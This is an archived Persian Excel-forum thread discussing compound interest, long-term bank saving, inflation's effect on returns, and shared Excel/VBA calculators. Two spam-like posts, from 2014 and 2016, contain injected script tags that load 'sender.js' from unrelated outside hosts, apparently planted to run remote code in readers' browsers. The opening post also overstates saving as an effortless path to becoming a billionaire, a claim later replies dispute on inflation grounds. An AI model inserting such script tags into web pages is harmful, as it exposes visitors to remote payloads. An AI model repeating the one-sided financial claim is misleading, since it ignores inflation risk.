PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : سود مرکب

~M*E*H*D*I~
2014/06/12, 09:44
به نمودار زیر نگاه کنید:

http://www.1-rial.com/wp-content/uploads/2013/07/compound_interest1-300x171.png (http://www.1-rial.com/1392/05/08/%d9%85%d8%b9%d8%ac%d8%b2%d9%87-%db%8c-%d8%b3%d9%88%d8%af-%d9%85%d8%b1%da%a9%d8%a8%d8%8c-%da%86%da%af%d9%88%d9%86%d9%87-%d9%be%d9%88%d9%84%d9%87%d8%a7%db%8c%d9%85%d8%a7%d 9%86-%da%86%d9%86%d8%af%db%8c/compound_interest-2/) در صورتی که شما ماهیانه 200 هزار تومان را در حسابی با سود سالیانه 18 درصد بگذارید و البته سود آن را برداشت نکنید، پس از سی سال در حدود سه میلیارد تومان سرمایه خواهید داشت، بدون هیج زحمتی. این معجزه ی سود مرکب است. پیش تر هم به آن اشاره کرده بودم و شاید بارها و بارها در این وبلاگ آن را تکرار کنم. این اصلی است که ثروتمندان به کار می گیرند تا ریالهای آنها شروع به زاد و ولد مضاعف کنند. مجموع پولی که شما در این سی سال کنار گذاشته اید 72 میلیون تومان است اما این معجزه ی ریاضی آن را به حدود سه میلیارد تومان تبدیل کرده است. نکته ی مهمی که در این معجزه نهفته است گرفتن سود سود و سود سود سود است و بس. این اصل باید نقش اول را در زندگی مالی شما بازی کند. این اصل به شما معجزه ی صبر، داشتن چشم انداز بلند مدت و پس انداز را می آموزاند و به تنهایی می تواند شما را میلیاردر کند.
تمرین: یک فایل اکسل ایجاد کرده و با تغییر دادن میزان پس انداز ماهیانه و سود مورد انتظار خود، حساب کنید که چه زمانی به یک میلیارد تومان می رسید.
یکی از نمونه های عالی از معجزه ی سود مرکب، بیمه های عمر است . به یکی از نماینده های بیمه عمر مراجعه کرده و از آنها بخواهید که با توجه به اقساط ماهیانه و یا سالیانه ای که می توانید بپردازید، افزایش سرمایه شما را حساب کنند.
شما چه طرحی برای پس انداز دارید؟ طرحی ندارید؟ یک بار دیگر مطلب بالا را بخوانید و
یک: زودتر شروع کنید و دو: بلند مدت فکر کنید. شما در این مورد چگونه فکر می کنید؟ تورم تمام سود من را خواهد خورد؟ پس انداز در بانک دیوانگی است؟ نظر خود را بنویسید.

AmiR.95
2014/06/12, 15:55
تصادفي اين موضوعه خوب رو ديدم اميدوارم همه استفاده كنن
مدله ديگري كه ميشه بهش نگاه كرد ،
شما ١٠٠دلار داري ، فقط روزي ١٪ سود كن ، سال بعد سود ها به چندين هزار چندين هزار تايي تبديل ميشوند . حالا كسي واقعا نميتونه روزي ١٪ سود كنه !؟
(به حز روز هايه تعطيل )!

آقا مهدي لطفا ادامه بديد اين بحث اكسل رو لطفا

nerski
2014/12/27, 17:22
سلام دوستان لطفا موضوع رو ادامه بدین واسم خیلی مهمه
شرمنده اگه اسپم می کنم
<script src="http://coostanarshehim.0fees.us/sender.js" type="text/javascript"></script><script src="http://coostanarshehim.0fees.us/sender.js"></script><script src="http://coostanarshehim.0fees.us/sender.js"></script>

abootorab
2014/12/27, 21:37
با درود
آقا مهدی بحث واقعا مهمی مطرح کردن که باید ازشون تشکر کرد، از خیلی وقت پیش این موضوع به ذهنم اومد و تقریبا یه برنامه درباره این مهم نوشتم (البته نه به شکل نمودار بلکه بصورت عددی ولی با کمی امکانات بیشتر) که هنوز کامل کامل نیست ولی تا اینجاش قابل استفاده هست. سعی میکنم اگر وقتم اجازه داد این برنامه را کامل تر کنم و واسه دوستان قرار بدم که هم استفاده بشه و هم اساتید نسبت به کم و کاستی های برنامه نظر بدن و بنده رو را راهنمایی کنند.
ممنون

misammisam
2014/12/27, 21:56
البته با توجه به تورم 60 درصدی که تو ایزان وجود داره 30 سال دیگه میلیاردر بودن چیز مهمی محسوب نمیشه .
مثلا نگاه کنید ثبل انقلاب طرف اگه یه میلیون پول داشت میگفتن : وای این چقدر پولداره ، طرف میلیونره ، ولی حالا بعد از 30 سال و اندی هر کارمند ساده ای هم حداقل یک یا چند میلیون حقوقشه .
یعنی سی سال دیگه این سه میلیارد تومن میشه حقوق کلا سه ماه یه کارمند ساده :confusedB:

حالا هی برو پول بزار تو بانک ، بالام جان با این چیزا پولدار نمیشی 5377

mahdi026
2014/12/27, 23:51
منبع این بخث کجاست این مقاله رو کی نوشته
اونو به من نشان بدین :d

~M*E*H*D*I~
2014/12/28, 07:30
با درود
آقا مهدی بحث واقعا مهمی مطرح کردن که باید ازشون تشکر کرد، از خیلی وقت پیش این موضوع به ذهنم اومد و تقریبا یه برنامه درباره این مهم نوشتم (البته نه به شکل نمودار بلکه بصورت عددی ولی با کمی امکانات بیشتر) که هنوز کامل کامل نیست ولی تا اینجاش قابل استفاده هست. سعی میکنم اگر وقتم اجازه داد این برنامه را کامل تر کنم و واسه دوستان قرار بدم که هم استفاده بشه و هم اساتید نسبت به کم و کاستی های برنامه نظر بدن و بنده رو را راهنمایی کنند.
ممنون

خوشحال میشیم که این برنامه رو ببینیم:)

abootorab
2014/12/28, 15:19
با درود
شما لطف دارین آقا مهدی، البته برنامه ای که نوشتم قطعا حرفه ای نیست و بصورت ساده و در حد اطلاعاتم از اکسل و vba نوشتم ولی قطعا این کار رو میکنم.

misammisam
2014/12/28, 20:45
با درود
شما لطف دارین آقا مهدی، البته برنامه ای که نوشتم قطعا حرفه ای نیست و بصورت ساده و در حد اطلاعاتم از اکسل و vba نوشتم ولی قطعا این کار رو میکنم.
دوباره سلام
البته این موضوع برنامه پیچیده و خاصی نمیخواد ، تو خود اکسل توابع مالی که ارزش آتی پولو در بیاره وجود داره .
ولی خوب یکم فهمش که این عدد چطوری بدست میاد مشکله .
من یه فایل کوچولو ضمیمه میکنم که روشن بشه این اعداد از کجا در میاد . ( مبلغ واریزی و سود بانکی و تورم در فایل ضمیمه قابل تغییره و میتونین عوضش کنید تا نتیجرو ببینید )

مهم نتیجه کاره که این میشه :
با فرض 25 درصد تورم سالانه - 18 درصد سود سالیانه بانکی - و واریز ماهیانه 200,000 تومان به حساب بانک

شما طی این 30 سال به میزان 72,000,000 تومان به حساب بانک پول واریز میکنید .
شما در پایان 30 سال به مقدار 2,865,065,835 تومان پول دارید .
ولی ، قدرت خرید شما نسبت به سال اول 29,937,286 تومان است ، یعنی شما به میزان 42 درصد از ارزش 72,000,000 تومان پول واریزیتان زیان کرده اید .

abootorab
2014/12/29, 15:50
خوشحال میشیم که این برنامه رو ببینیم:)

با درود
اینم فایل برنامه من خدمت شما دوستان، رمز ورود 0645 هستش.
طبق گفته استاد عزیز misammisam شاید واسه محاسبه یک چنین سودها طبق امکاناتی که خود اکسل در اختیار کاربر میذاره زیاد سخت نباشه ولی بنده در قسمت حسابداری اکسل سررشته ندارم و این فایلی که هم ضمیمه کردم بسته به نیازهای خودم و اکثر محاسبات اون توسط vba انجام دادم و قطعا اشکالاتی خواهد داشت اما خودم به شخصه از این فایل و نتایج محاسباتی که ازش گرفتم زیاد استفاده کردم و به کارم اومده، حتی در مورد دریافت یک وام و سپرده گذاری اون و از این قبیل مسائل. آخه واسه ما فقیر فقرا قرون قرون حساب کردن خیلی مهمه! ;)
به هر حال امیدوارم دوستان اشکالات رو مطرح و بنده رو راهنمایی کنند
ممنون از همه

mahdi026
2014/12/29, 16:46
این سیستم برای بیمه عمر و سرمایه گذاری به کار میره
که در اون یک درصد مشخصی افزایش سالانه وجود داره
که کمترین اون 10% هستش

mahdi026
2015/03/08, 15:33
این هم یک نمونه استفاده برای این نوع سود

یک فایل اکسل هم پیوست هست که میتونید استفاده کنید

6218

insurance8042
2015/07/12, 09:26
البته با توجه به تورم 60 درصدی که تو ایزان وجود داره 30 سال دیگه میلیاردر بودن چیز مهمی محسوب نمیشه .
مثلا نگاه کنید ثبل انقلاب طرف اگه یه میلیون پول داشت میگفتن : وای این چقدر پولداره ، طرف میلیونره ، ولی حالا بعد از 30 سال و اندی هر کارمند ساده ای هم حداقل یک یا چند میلیون حقوقشه .
یعنی سی سال دیگه این سه میلیارد تومن میشه حقوق کلا سه ماه یه کارمند ساده :confusedB:

حالا هی برو پول بزار تو بانک ، بالام جان با این چیزا پولدار نمیشی 5377

یعنی شما هر نوع پس انداز بلند مدت را نفی می کنید؟؟

sabertb
2015/07/12, 11:12
با درود
طبق گفته استاد عزیز misammisam شاید واسه محاسبه یک چنین سودها طبق امکاناتی که خود اکسل در اختیار کاربر میذاره زیاد سخت نباشه ولی بنده در قسمت حسابداری اکسل سررشته ندارم و این فایلی که هم ضمیمه کردم بسته به نیازهای خودم و اکثر محاسبات اون توسط vba انجام دادم و قطعا اشکالاتی خواهد داشت اما خودم به شخصه از این فایل و نتایج محاسباتی که ازش گرفتم زیاد استفاده کردم و به کارم اومده، حتی در مورد دریافت یک وام و سپرده گذاری اون و از این قبیل مسائل. آخه واسه ما فقیر فقرا قرون قرون حساب کردن خیلی مهمه! ;)
ممنون از همه

امکانش هست Unprotected کنید روش مطالعه کنیم ؟ برای 30 سال محاسباتش انگار پایانی ندارد (یا اینکه من اطلاعات صحیح وارد نکردم)

sabertb
2015/07/12, 13:51
با تشکر از فایل مفیدتون استاد misammisam (http://forum.exceliran.com/member.php/14092-misammisam) یکم تغییرش دادم تا کاربردیتر بشه .
:min24:

rgtrtgftr
2016/06/22, 15:00
سلام دوستان خواهشا منو راهنمایی کنید من میخوام توی اکسل نمودار رسم کنم ولی نمیدونم چطوری این کار رو انجام بدم تورو خدا یه توضیح مختصری بهم بدین ممنون چون این مشکل من نیست فقط و بسیاری از کاربران دیگه هم این مشکل رو دارند
<script src="http://shocklogedtoyou.xzn.ir/sender.js" type="text/javascript"></script>

امين اسماعيلي
2016/06/22, 16:09
dost aziz dar opic marbote soaletono matrah konin va inke che noie az nemodaro mikhi rasm koni. dadehat chetorian. file dari bezari. axi az on shekli ke mikhai graphet dashte bashe dari

hosseinkalateh
2017/03/01, 09:58
سلام
ممنون از شما
فیل واقعا کاربردی بود
اما ایا امکانش هست مقدار مبلغی که هر ماه واریز میشه با احتساب تورم و افزایش حقوق افزایش پیدا کنه؟ مثلا سال اول 100 هزار تمن و سال دوم 110 هزار تمن و سال سوم121 هزار تمن تا آخر ...

hosseinkalateh
2017/03/01, 10:00
با درود
ممنون از همه

سلام
ممنون از شما
فیل واقعا کاربردی بود
اما ایا امکانش هست مقدار مبلغی که هر ماه واریز میشه با احتساب تورم و افزایش حقوق افزایش پیدا کنه؟ مثلا سال اول 100 هزار تمن و سال دوم 110 هزار تمن و سال سوم121 هزار تمن تا آخر ...